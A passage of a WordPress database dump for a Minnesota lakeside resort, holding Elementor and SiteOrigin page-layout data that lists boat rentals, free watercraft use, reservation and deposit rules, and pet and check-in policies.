CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF PADDLE BOARDS FOR GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks, paddle boards, canoes or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1556,702,'_wp_page_template','default'),(1557,702,'_elementor_edit_mode','builder'),(1558,702,'_elementor_template_type','post'),(1559,702,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">16 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">RENT A PADDLE BOARD<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1560,61,'_elementor_version','2.5.16'),(1561,703,'_wp_page_template','default'),(1562,703,'_elementor_edit_mode','builder'),(1563,703,'_elementor_template_type','post'),(1564,703,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">16 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $ 5.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">RENT A PADDLE BOARD<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1565,703,'_elementor_version','0.4'),(1587,17,'metaslider_slideshow_theme',''),(1593,64,'_elementor_template_type','post'),(1594,633,'_elementor_template_type','wp-post'),(1595,46,'_elementor_template_type','post'),(1596,37,'_elementor_template_type','post'),(1611,613,'wpforms_entries_count','357'),(1617,711,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:19:\"sow-editor-71110000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:19:\"sow-editor-71110001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:19:\"sow-editor-71110002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:19:\"sow-editor-71110003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1619,43,'_elementor_template_type','post'),(1653,2,'vantage_panels_no_legacy','true'),(1654,720,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:15:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72010000\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:1;a:15:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72010001\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:2;a:15:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72010002\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:146:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</h3>\n<h5 style=\"text-align: center;\"><em> </em></h5>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:19:\"_sow_form_timestamp\";s:13:\"1554065104861\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-72010003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:2;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:2;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:3;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1655,2,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1656,721,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:15:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210000\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:1;a:15:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\